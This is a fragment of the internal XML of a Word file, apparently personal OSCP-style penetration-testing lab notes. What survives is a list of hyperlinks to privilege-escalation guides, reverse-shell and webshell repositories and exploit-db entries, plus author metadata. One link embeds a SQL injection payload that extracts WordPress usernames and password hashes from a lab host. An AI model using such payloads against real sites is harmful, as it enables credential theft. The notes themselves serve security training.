    <w:rsid w:val="00545F7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F7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ntest.blog/windows-privilege-escalation-methods-for-pentesters/" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentest.blog/windows-privilege-escalation-methods-for-pentesters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blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/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github.com/lukechilds/reverse-shell" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://justpentest.blogspot.sg/2015/07/minishare1.4.1-bufferoverflow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10.11.0.55/wp/wp-content/plugins/wp-forum/feed.php?topic=-4381+union+select+group_concat%28user_login,0x3a,user_pass%29+from+wp_users%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8143160/how-can-i-download-a-file-with-batch-file-without-using-any-external-tools" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/349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10.11.1.31\wwwroot" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://stackoverflow.com/questions/42068271/trouble-understanding-gcc-linker-options" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://infamoussyn.com/2014/07/11/gaining-a-root-shell-using-mysql-user-defined-functions-and-setuid-binaries/" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cxsecurity.com/issue/WLB-2013020035" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://digitalforensicstips.com/2016/09/a-script-to-help-automate-windows-enumeration-for-privilege-escalation/" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.fuzzysecurity.com/tutorials/16.html" TargetMode="Externa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imonuvarov.com/privilege-escalation-via-token-kidnapping/" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://speakerdeck.com/knaps/escape-from-shellcatraz-breaking-out-of-restricted-unix-shells" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hashcat.net/wiki/doku.php?id=example_hashes" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/warner/magic-wormhole" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.portswigger.net/customer/portal/articles/1964020-using-burp-to-brute-force-a-login-page" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://lmgsecurity.com/enable-start-ssh-kali-linux/" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.11.1.251/wp/" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/WhiteWinterWolf/wwwolf-php-websh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1.1.39/otrs/index.pl" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.fuzzysecurity.com/tutorials/16.html" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/40839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10.11.1.71/cgi-bin/admin.cgi" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/abatchy17/WindowsExploits" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.offensive-security.com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github.com/WhiteWinterWolf/wwwolf-php-webshel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entestmonkey/windows-privesc-check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hyperlink" Target="https://github.com/411Hall/JAWS" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sushant747.gitbooks.io/total-oscp-guide/content/port_forwarding_and_tunneling.html" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ivoidwarranties.tech/posts/pentesting-tuts/pivoting/pivoting-basics/" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentest.blog/windows-privilege-escalation-methods-for-pentes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66AF6F-4DAA-4C66-9A1B-C114FD06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5</TotalTime>
  <Pages>20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UA RUI XIANG IVAN#</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Ivan Chua</cp:lastModifiedBy>
  <cp:revision>27</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-10-17T15:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-07-23T06:39:00Z</dcterms:modified>
</cp:coreProperties>
</file>